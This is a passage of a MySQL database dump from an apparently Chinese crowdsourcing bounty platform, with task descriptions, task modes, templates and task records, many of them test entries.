15:09:33'),(47,'发布单人悬赏的要求发布单人悬赏的要求发布单人悬赏的要求发布单人悬赏的要求发布单人悬赏的要求发布单人悬赏的要求发布单人悬赏的要求',47,'2019-10-30 10:08:37','2019-10-30 10:08:37'),(48,'该算法需要为大规模机器人实时仿真提供支撑。具体地,通过设计实现高效的碰撞检测算法,解决机器人仿真规模超过1000时,传统算法会产生大量碰撞计算的问题。算法的输入是所有实体的位置坐标,输出是经过碰撞检测之后得到的可能发生碰撞的实体列表。\r\n成果形式:算法和设计文档',48,'2019-11-01 15:17:59','2019-11-01 15:17:59'),(49,'该算法需要为大规模机器人实时仿真提供支撑。具体地,通过设计实现高效的碰撞检测算法,解决机器人仿真规模超过1000时,传统算法会产生大量碰撞计算的问题。算法的输入是所有实体的位置坐标,输出是经过碰撞检测之后得到的可能发生碰撞的实体列表。\r\n成果形式:算法和设计文档\r\n',49,'2019-11-01 15:19:51','2019-11-01 15:19:51'),(50,'工具在Linux系统上运行;支持对源程序、构件、动态库、服务、二进制等5种代码形式生成可视化网络;支持动态网络3D展示;支持实时过滤网络;支持5000节点和100万条边;支持500个节点信息展示;提供节点信息导入接口,遵循GDF接口标准;使用Python编程,可基于现有开源工具改造,相应开源协议需支持衍生物产权转移。\r\n交付形式:软件依赖网络可视化工具一套,附带源代码和相关开发文档。\r\n',50,'2019-11-01 15:27:04','2019-11-01 15:27:04'),(51,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。',51,'2019-11-05 10:14:55','2019-11-05 10:14:55'),(52,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。',52,'2019-11-05 10:21:58','2019-11-05 10:21:58'),(53,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。',53,'2019-11-05 10:25:19','2019-11-05 10:25:19'),(54,' 基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。',54,'2019-11-05 10:34:33','2019-11-05 10:34:33'),(55,'mm',55,'2019-11-05 10:58:27','2019-11-05 10:58:27'),(56,'Q',56,'2019-11-05 16:00:14','2019-11-05 16:00:14'),(57,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',57,'2019-11-06 17:04:08','2019-11-06 17:04:08'),(58,'q',58,'2019-11-07 11:27:28','2019-11-07 11:27:28'),(59,'工具在Linux系统上运行;支持对源程序、构件、动态库、服务、二进制等5种代码形式生成可视化网络;支持动态网络3D展示;支持实时过滤网络;支持5000节点和100万条边;支持500个节点信息展示;提供节点信息导入接口,遵循GDF接口标准;使用Python编程,可基于现有开源工具改造,相应开源协议需支持衍生物产权转移。\r\n交付形式:驱动程序源代码和相关开发文档。\r\n',59,'2019-11-07 16:42:59','2019-11-07 16:42:59'),(60,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。',60,'2019-11-07 16:43:38','2019-11-07 16:43:38'),(61,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',61,'2019-11-08 14:57:17','2019-11-08 14:57:17'),(62,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',62,'2019-11-08 14:57:46','2019-11-08 14:57:46'),(63,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',63,'2019-11-08 14:57:52','2019-11-08 14:57:52'),(64,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',64,'2019-11-08 14:58:25','2019-11-08 14:58:25'),(65,'工具在Linux系统上运行;支持对源程序、构件、动态库、服务、二进制等5种代码形式生成可视化网络;支持动态网络3D展示;支持实时过滤网络;支持5000节点和100万条边;支持500个节点信息展示;提供节点信息导入接口,遵循GDF接口标准;使用Python编程,可基于现有开源工具改造,相应开源协议需支持衍生物产权转移。\r\n交付形式:驱动程序源代码和相关开发文档。\r\n',65,'2019-11-08 14:59:49','2019-11-08 14:59:49'),(66,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n',66,'2019-11-11 10:02:42','2019-11-11 10:02:42'),(67,'基于机器学习对复杂多样的数据进行深层次的分析,更高效地利用信息成为当前大数据环境下机器学习研究的主要方向。所以,机器学习越来越朝着智能数据分析的方向发展,并已成为智能数据分析技术的一个重要源泉。本次征集主要完成对大数据样本的采集工作,用于训练机器人在诸如文本的理解、文本情感的分析、图像的检索和理解、图形和网络数据的分析等方面的能力。\r\n交付物:数据的物化成果和阐述文档等\r\n1. ',67,'2019-11-11 17:20:42','2019-11-11 17:20:42'),(68,'sdf',68,'2019-11-12 11:28:53','2019-11-12 11:28:53'),(69,'网络平台管理权限分配',69,'2019-11-13 08:44:26','2019-11-13 08:44:26'),(70,'asdf',70,'2019-11-18 11:11:24','2019-11-18 11:11:24'),(71,'1',71,'2019-11-20 17:00:57','2019-11-20 17:00:57'),(72,'2',72,'2019-11-20 17:01:06','2019-11-20 17:01:06'),(73,'3',73,'2019-11-20 17:01:14','2019-11-20 17:01:14'),(74,'4',74,'2019-11-20 17:01:20','2019-11-20 17:01:20'),(75,'4',75,'2019-11-20 17:01:27','2019-11-20 17:01:27'),(76,'5',76,'2019-11-20 17:01:38','2019-11-20 17:01:38'),(77,'6',77,'2019-11-20 17:02:27','2019-11-20 17:02:27'),(78,'7',78,'2019-11-20 17:02:34','2019-11-20 17:02:34'),(79,'9',79,'2019-11-20 17:02:41','2019-11-20 17:02:41'),(80,'9',80,'2019-11-20 17:02:54','2019-11-20 17:02:54'),(81,'9',81,'2019-11-20 17:03:02','2019-11-20 17:03:02'),(82,'是是是',82,'2019-11-20 19:17:03','2019-11-20 19:17:03'),(83,'东方故事 ',83,'2019-11-20 19:39:33','2019-11-20 19:39:33'),(84,'水电费',84,'2019-11-20 19:39:54','2019-11-20 19:39:54'),(85,'22332',85,'2019-11-20 19:50:11','2019-11-20 19:50:11'),(86,'士大夫撒旦',86,'2019-11-21 10:25:50','2019-11-21 10:25:50'),(87,'士大夫撒旦',87,'2019-11-21 10:26:20','2019-11-21 10:26:20'),(88,'士大夫撒旦',88,'2019-11-21 10:37:04','2019-11-21 10:37:04'),(89,'sd ',89,'2019-11-21 14:51:00','2019-11-21 14:51:00'),(90,'F',90,'2019-12-03 15:11:52','2019-12-03 15:11:52'),(91,'希望有做过类似项目的承接此程序。此程序为window桌面程序,支持winXP和其以后的windows系统。\r\n\r\n1,实现带波形界面效果的音频的录制,波形界面与MIC音频同步,附件->录音机的那个效果就可以。\r\n\r\n2,录音时长固定(参数可设),时间到后,自动保存文件。\r\n\r\n3,获取系统音频播放音量,录音音量。并实现API调整其值(如:软件设置播放50音量,则设置系统播放音量为50)。\r\n\r\n4,实现所录制音频的播放,并同样同步绘制播放时的波形。\r\n\r\n5,在录音波形绘制界面,振幅高位值,如80%(音量过大)和低位值20%(音量过小),绘制一条横向红线。\r\n\r\n6,音频的一些降噪处理,此项非本需求必需完成,如能实现,效果好,可另酬',91,'2019-12-30 09:16:22','2019-12-30 09:16:22'),(92,'1.开发一个GPS功能的系统。包括移动端APP和web展示等功能;\r\n\r\n2.APP需要能实时定位;要能显示实时运行轨迹;APP要能记录人员运行轨迹,并上传至web端进行查看回放(可以按照时间显示,并且可以动态回放巡检运行过程);\r\n\r\n3.web端可以在地图上同时看到多个APP终端实时所处位置,保证管理者可知道每个员工所处地点;\r\n\r\n可选定人员进行目标跟踪显示。地图窗口显示当前定位状态信息及从当前时间开始的行驶轨迹,便于在紧急情况或特殊情况下观察人员的实时状态;\r\n\r\n4.当人员在一定区域内逗留时间过长时,要有警告提示功能;\r\n\r\n5.需要为工厂建模,因APP主要使用在工厂里,所以需要建立工厂内部地图,保证定位功能切实有效;\r\n\r\n6.在内/外网环境下,系统功能均可正常使用。\r\n\r\n7.要求适应室外、室内两种使用场景,且可实现无缝切换(因使用环境主要是工厂的室外和车间内部,用户在从室外进入室内时,不需要进行任何额外操作即可实现)。\r\n\r\n室内场景的定位方案可以增加硬件辅助设备(蓝牙方案除外)。\r\n\r\n室外精度要求达到1米;室内精度要求20厘米以内。\r\n\r\n8.APP使用uniapp实现应用跨平台。\r\n\r\n9.系统为B/S系统。技术方案应基于java springboot框架去实现,数据库为mysql;',92,'2019-12-30 09:18:04','2019-12-30 09:18:04'),(93,'寻找汽车牌照识别现成品,就是你曾做过一样的\r\n\r\n有开发过的请投标!要有手机端给我们看看。\r\n\r\n未开发过的,请不要投标了,不想浪费时间!\r\n\r\n\r\n利用摄像头实时捕获汽车牌照的部分图,然后识别出一张完整的牌,用这个方式把整个牌照全部识别出来。\r\n\r\n看不懂的请看图片\r\n\r\n一定要有现成源码,最好现在市场上有成熟产品是用你的识别算法。\r\n\r\n\r\n',93,'2019-12-30 09:56:54','2019-12-30 09:56:54'),(94,'大概需求:\r\n\r\n1.每天有N个时序数据,(N大约几百到1000),一共有M天 M可变(30-2000不等)。\r\n\r\n2.每一天,按小时将时序数据转化为FFT频谱。之后计算N个数据间每小时的spectrum的conjugate multiply,再IFFT到时序数据\r\n\r\n要求:\r\n\r\n1.linux下commandline运行\r\n\r\n2.ANSI C+cuda实现\r\n\r\n3.主要是效率优化,需要实现基于C的HDF5文件存储\r\n\r\n非GPU版本code有,主要基于cuFFT(期望更底层一点)来应付更复杂的调整。\r\n\r\n有linux C和HDF5经验的比较合适。\r\n\r\n\r\n',94,'2019-12-30 10:01:12','2019-12-30 10:01:12'),(95,'暮色里,小镇名叫泥瓶巷的僻静地方,有位孤苦伶仃的清瘦少年,此时他正按照习俗,一手持蜡烛,一手持桃枝',95,'2020-03-23 08:56:09','2020-03-23 08:56:09'),(96,'暮色里,小镇名叫泥瓶巷的僻静地方,有位孤苦伶仃的清瘦少年,此时他正按照习俗,一手持蜡烛,一手持桃枝',96,'2020-03-23 08:57:37','2020-03-23 08:57:37'),(97,'暮色里,小镇名叫泥瓶巷的僻静地方,有位孤苦伶仃的清瘦少年,此时他正按照习俗,一手持蜡烛,一手持桃枝阿萨德',97,'2020-03-23 08:58:30','2020-03-23 08:58:30'),(98,'暮色里,小镇名叫泥瓶巷的僻静地方,有位孤苦伶仃的清瘦少年,此时他正按照习俗,一手持蜡烛,一手持桃枝,照耀房梁、墙壁、木床等处,用桃枝敲敲打打,试图借此驱赶蛇蝎、蜈蚣等,嘴里念念有词,是这座小镇祖祖辈辈传下来的老话:二月二,烛照梁,桃打墙,人间蛇虫无处藏。',98,'2020-03-23 09:09:47','2020-03-23 09:09:47'),(99,'测试把内容保持为草稿及把草稿再次编辑后发布的流程是否正确',99,'2020-03-23 09:13:44','2020-03-23 09:13:44'),(100,'手机5g开发与应用 ',100,'2020-03-23 09:15:27','2020-03-23 09:15:27'),(101,'手机5g开发与应用 \r\n',101,'2020-03-23 09:15:33','2020-03-23 09:16:16'),(102,'测试把内容保持为草稿及把草稿再次编辑后发布的流程是否正确',102,'2020-03-23 09:18:03','2020-03-23 09:18:03'),(103,'测试把内容保持为草稿及把草稿再次编辑后发布的流程是否正确==01 \r\n测试草稿标题为重复的,怎么办?===?',103,'2020-03-23 09:25:43','2020-03-23 09:27:39'),(104,'11',104,'2020-03-23 17:16:10','2020-03-23 17:16:10'),(105,'111',105,'2020-03-24 08:22:34','2020-03-24 08:22:34'),(106,'11',106,'2020-03-24 08:48:37','2020-03-24 08:48:37'),(107,'233',107,'2020-03-24 08:49:56','2020-03-24 08:49:56'),(108,'11',108,'2020-03-24 08:50:46','2020-03-24 08:50:46'),(109,'阿萨德',109,'2020-03-25 15:51:38','2020-03-25 15:51:38'),(110,'1',110,'2020-03-25 15:52:03','2020-03-25 15:52:03'),(111,'This is a test',111,'2020-03-26 16:51:13','2020-03-26 16:51:13'),(112,'QQ',112,'2020-03-27 15:32:16','2020-03-27 15:32:16'),(113,'1',113,'2020-04-02 15:35:27','2020-04-02 15:35:27'),(114,'2020年04月09--9:00',114,'2020-04-09 09:03:55','2020-04-09 09:03:55'),(115,'体现创新、融合、开源……',115,'2020-10-15 10:05:37','2020-10-15 10:05:37'),(116,'实现以下主要功能:\r\n一、用户类型\r\n1(专家本人:指填写个人信息的专家用户。\r\n2(专家所在单位:指审核本单位专家信息的单位用户。\r\n3(相关中心。\r\n二、用户注册\r\n点击登录页面右下角的“注册”按钮~进入用户注册页面\r\n2(单位用户注册:\r\n单位用户首先填写单位名称和组织机构代码\r\n3(相关中心:初始登录信息由奖励办统一设定~相关中心可自行修改登录密\r\n码。\r\n三、单位信息填写、维护与管理\r\n1(单位基本信息维护:所在单位和相关中心用户进入系统后~点击左侧“单位信息”菜单~即可对用户信息进行实时的维护\r\n2(所属二级单位管理:二级单位信息由专家所在单位做统一管理\r\n四、专家信息填写\r\n专家注册时填写过的相关信息会自动显示在信息填写界面不需再填写。其\r\n他空白信息需要用户填写完整如:\r\n1(“基金/计划”和“所获荣誉”。\r\n2(所在重点实验室。\r\n3、从事技术管理、研发工作累计年限。\r\n4、“熟悉学科”。\r\n五、专家信息上报和单位审核\r\n六、在线评分系统\r\n1.专家登录后,根据专业组分类,对自己所在的专业组中的用户提交的各种提案进行在线评审并给出,相应的分值。\r\n2.评分统计及输出。',116,'2020-10-15 10:16:17','2020-10-15 10:16:17'),(117,'基于互联网大数据的数据挖掘算法验证',117,'2020-10-16 08:02:44','2020-10-16 08:02:44'),(118,'5G蜂窝移动通信系统',118,'2020-10-16 08:48:57','2020-10-16 08:48:57'),(119,'数据采集是所有数据系统必不可少的,随着大数据越来越被重视,数据采集的主要实现以下:\r\n\r\n 数据源多种多样\r\n 数据容量大\r\n 采集变化快\r\n 保证数据采集的可靠性\r\n 避免重复数据\r\n 保证数据的质量\r\n使用JSON文件来统一日志数据。\r\n支持可插拔架构,支持各种不同种类和格式的数据源和数据输出。\r\n同时提供了高可靠和很好的扩展性。Treasure Data, Inc 对该产品提供支持和维护。',119,'2020-10-16 12:24:33','2020-10-16 12:24:33'),(120,'5G通信在医疗手术中的应用',120,'2020-12-01 11:12:19','2020-12-01 11:12:19'),(121,'具体见附件',121,'2021-02-23 14:44:31','2021-02-23 14:44:31'),(122,'111',122,'2021-02-23 16:35:44','2021-02-23 16:35:44');
|
||
/*!40000 ALTER TABLE `task_details` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `task_modes`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `task_modes`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `task_modes` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`position` int(11) DEFAULT '1000',
|
||
`key` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `task_modes`
|
||
--
|
||
|
||
LOCK TABLES `task_modes` WRITE;
|
||
/*!40000 ALTER TABLE `task_modes` DISABLE KEYS */;
|
||
INSERT INTO `task_modes` VALUES (1,'单人悬赏','2019-08-05 16:00:01','2020-03-27 10:25:18',1000,'Single'),(2,'多人悬赏','2019-08-05 16:00:01','2020-03-27 10:25:39',1000,'Mutiple'),(3,'计件悬赏','2019-08-05 16:00:01','2020-03-27 10:25:58',1000,'Count');
|
||
/*!40000 ALTER TABLE `task_modes` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `task_templates`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `task_templates`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `task_templates` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`template_type` varchar(255) DEFAULT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `task_templates`
|
||
--
|
||
|
||
LOCK TABLES `task_templates` WRITE;
|
||
/*!40000 ALTER TABLE `task_templates` DISABLE KEYS */;
|
||
INSERT INTO `task_templates` VALUES (1,'xlsx',523,'2019-08-14 09:55:12','2019-08-14 09:55:12'),(2,'pdf',983,'2019-11-22 16:11:06','2019-11-22 16:11:06');
|
||
/*!40000 ALTER TABLE `task_templates` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `tasks`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `tasks`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `tasks` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`bounty` decimal(10,2) DEFAULT '0.00',
|
||
`number` varchar(255) DEFAULT NULL,
|
||
`published` tinyint(1) DEFAULT '0',
|
||
`visits` int(11) DEFAULT '0',
|
||
`expired_at` datetime DEFAULT NULL,
|
||
`published_at` datetime DEFAULT NULL,
|
||
`publish_mode` int(11) DEFAULT '0',
|
||
`collection_mode` int(11) DEFAULT '0',
|
||
`show_user_mode` int(11) DEFAULT '0',
|
||
`status` int(11) DEFAULT '0',
|
||
`papers_count` int(11) DEFAULT '0',
|
||
`task_mode_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`category_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`enterprise_name` varchar(255) DEFAULT NULL,
|
||
`contact_name` varchar(255) DEFAULT NULL,
|
||
`contact_phone` varchar(255) DEFAULT NULL,
|
||
`show_user_status` tinyint(1) DEFAULT '0',
|
||
`agreement_signing` int(11) DEFAULT '0',
|
||
`is_delete` tinyint(1) NOT NULL DEFAULT '0',
|
||
`ip` varchar(255) DEFAULT NULL,
|
||
`paid_at` datetime DEFAULT NULL,
|
||
`make_public_at` datetime DEFAULT NULL,
|
||
`collecting_days` int(11) DEFAULT NULL,
|
||
`choosing_days` int(11) DEFAULT NULL,
|
||
`make_public_days` int(11) DEFAULT NULL,
|
||
`signing_days` int(11) DEFAULT NULL,
|
||
`paying_days` int(11) DEFAULT NULL,
|
||
`except_closed_boolean` tinyint(1) DEFAULT '0',
|
||
`is_proof_boolean` tinyint(1) DEFAULT '0',
|
||
`cancel_status` int(11) DEFAULT '0',
|
||
`is_signing_upload` int(11) DEFAULT '0',
|
||
`is_paying_upload` tinyint(1) DEFAULT '0',
|
||
`upload_proof_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_tasks_on_number` (`number`),
|
||
KEY `index_tasks_on_name` (`name`),
|
||
KEY `index_tasks_on_category_id` (`category_id`),
|
||
KEY `index_tasks_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=123 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `tasks`
|
||
--
|
||
|
||
LOCK TABLES `tasks` WRITE;
|
||
/*!40000 ALTER TABLE `tasks` DISABLE KEYS */;
|
||
INSERT INTO `tasks` VALUES (1,'开源项目管理流程',199.00,'280453447775',1,168,'2019-08-15 09:00:00','2019-08-06 08:42:00',0,1,1,8,9,3,'2019-08-06 08:42:00','2019-08-20 14:39:35',7,46,'创客管理中心','DavidLi','18911166797',1,0,0,'106.121.3.139',NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(2,'5G网络在医疗手术中的应用',151.00,'472786355016',1,47,'2020-04-06 15:46:16','2019-08-07 15:46:16',1,0,0,3,0,2,'2019-08-06 16:20:00','2020-04-03 10:56:37',5,46,'创客管理中心','DavidLi','18911166797',0,2,0,'49.7.58.56','2019-08-13 00:00:00','2019-08-10 11:05:49',243,NULL,NULL,NULL,NULL,0,0,1,0,0,NULL),(4,'C语言通用教学课件',98.00,'788674857527',0,47,'2019-08-07 17:00:00','2019-08-06 16:30:38',0,0,0,8,1,2,'2019-08-06 16:30:38','2019-08-13 11:03:36',6,46,'创客管理中心','DavidLi','18911166797',0,0,0,'49.7.58.56',NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(5,'设计仿真平台UI界面',1990.00,'103376068317',1,115,'2019-08-08 15:00:00','2019-08-07 16:18:38',0,1,0,8,6,2,'2019-08-07 16:18:38','2019-10-25 10:22:47',6,46,'创客管理中心','DavidLi','18911166797',1,0,0,'106.121.133.94',NULL,NULL,NULL,1,NULL,NULL,NULL,0,0,1,0,0,NULL),(6,'飞行器驾驶理论论文征集',19987.00,'255911649274',0,53,'2019-08-08 17:00:00','2019-08-07 16:44:21',0,0,0,8,2,3,'2019-08-07 16:44:21','2019-09-12 14:40:47',1,52,'NUPT','周天阳管理','13667364915',0,0,0,'222.240.177.34',NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(7,'夏季防中暑妙招以及中暑后的紧急救治',500.00,'631146828180',1,97,'2019-08-09 17:00:00','2019-08-09 16:56:53',0,1,0,8,4,2,'2019-08-09 15:25:30','2019-08-26 14:07:28',3,50,'','张旭','15644444444',1,2,0,'222.240.177.34','2019-08-13 00:00:00',NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(8,'微信小程序开发',10000.00,'335133833775',1,29,'2019-08-13 09:00:00','2019-08-13 08:55:30',1,0,0,8,1,1,'2019-08-13 08:55:19','2019-09-16 12:46:03',7,50,'','张旭','15644444444',1,2,0,'113.246.127.82','2019-08-13 00:00:00','2019-08-13 09:44:25',NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(9,'机器人仿真的高效碰撞检测算法',30000.00,'891361780030',1,77,'2019-08-14 10:00:00','2019-08-13 12:16:09',0,0,1,8,4,2,'2019-08-13 12:16:09','2019-10-25 16:05:46',7,46,'创客管理中心','张三','18911166797',1,1,0,'106.121.139.36','2019-10-25 16:05:46','2019-08-19 11:10:33',NULL,NULL,NULL,NULL,NULL,0,0,0,0,1,NULL),(11,'5G网络在道路监控中的应用',35000.00,'082389736388',1,38,'2019-08-14 07:00:00','2019-08-13 15:57:45',1,0,0,8,2,3,'2019-08-13 12:40:23','2019-09-16 11:37:09',5,46,'创客管理中心','DavidLi','18911166797',0,2,0,'106.121.139.36','2019-08-13 00:00:00','2019-08-13 16:17:28',NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(12,'网络文学的版权问题',1990.00,'213380708038',1,11,'2019-08-13 14:46:17','2019-08-13 14:46:17',0,1,0,8,0,3,'2019-08-13 14:46:17','2021-02-23 16:39:59',2,49,'北京呵呵有限公司','1','15633333333',0,0,0,'106.121.139.36',NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,0,2,0,0,NULL),(13,'在线课堂的设计及制作',200.00,'025233349327',1,15,'2019-08-13 15:27:08','2019-08-13 15:27:08',1,1,0,8,0,1,'2019-08-13 15:13:44','2021-02-23 16:40:02',7,50,'','张旭','15644444444',0,2,0,'222.240.101.70',NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,0,2,0,0,NULL),(15,'人工智能对工业的影响',200.00,'683049840857',1,13,'2019-08-23 13:00:00','2019-08-23 12:56:55',1,1,0,8,1,1,'2019-08-23 12:56:31','2019-08-26 09:34:17',9,50,'','OpenSource','15644444444',0,2,0,'113.246.125.145','2019-08-26 00:00:00','2019-08-23 15:02:32',NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,NULL),(24,'界面设计',1000.00,'644651131070',1,29,'2019-09-26 11:00:00','2019-09-16 10:27:05',1,0,0,4,1,1,'2019-09-16 10:18:23','2019-11-24 19:09:23',7,55,'nudt','p17836459','13975850702',0,2,0,'117.136.89.75',NULL,NULL,NULL,3,NULL,NULL,NULL,0,0,1,0,0,NULL),(25,'软件工程流程规划',9996.00,'816988133857',1,57,'2019-11-03 08:53:23','2019-10-25 08:53:23',0,1,0,8,3,1,'2019-10-25 08:53:23','2020-03-26 16:54:05',7,49,'北京呵呵有限公司','121','15633333333',0,1,0,'106.3.194.224',NULL,NULL,1,3,3,1,1,1,1,2,1,0,'2019-10-25 15:05:06'),(27,'创客空间测试03',112.00,'339843316555',1,17,'2020-03-28 09:11:24','2020-03-23 09:11:24',0,0,0,8,3,2,'2019-10-25 09:13:16','2020-03-25 16:44:09',6,49,'北京呵呵有限公司','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,1,1,1,1,1,1,0,2,0,0,NULL),(30,'设计仿真平台UI界面',20000.00,'612032953920',1,73,'2019-10-27 14:33:54','2019-10-27 14:08:54',0,1,0,8,4,1,'2019-10-27 14:08:54','2021-03-12 09:51:59',7,49,'北京呵呵有限公司','1','15633333333',0,1,0,'111.201.152.63',NULL,NULL,1,3,5,7,9,0,1,0,1,0,'2019-10-27 14:18:55'),(32,'软件依赖网络可视化工具开发',3000.00,'471546342362',1,32,NULL,'2019-10-27 15:00:40',1,0,0,8,3,3,'2019-10-27 15:00:19','2020-03-23 08:40:03',7,49,'北京呵呵有限公司','1','15633333333',0,2,0,'111.201.152.63','2019-10-27 15:17:11',NULL,7,6,5,4,3,0,1,0,2,1,'2019-10-27 15:07:00'),(41,'导出需求',6666.00,'967473034411',0,0,NULL,NULL,1,0,0,2,0,2,'2019-10-29 09:37:40','2019-11-05 10:16:32',7,49,'北京呵呵有限公司','1','15633333333',0,2,0,'122.115.235.216',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(61,'gazebo 开源项目群体智能学习数据集征集 1',100000.00,'988133086910',1,208,'2019-11-10 14:18:36','2019-11-10 13:33:36',1,0,1,8,4,2,'2019-11-08 14:57:17','2021-03-15 11:07:44',6,49,'创新院人工智能中心','李国宁','15633333333',1,2,0,'106.3.194.186','2019-11-11 17:26:12',NULL,0,15,0,15,15,0,1,0,2,1,'2019-11-10 13:48:56'),(69,'网络平台管理权限分配',7.00,'820930144025',1,37,'2019-11-13 08:51:26','2019-11-13 08:44:26',0,1,0,8,2,1,'2019-11-13 08:44:26','2021-02-24 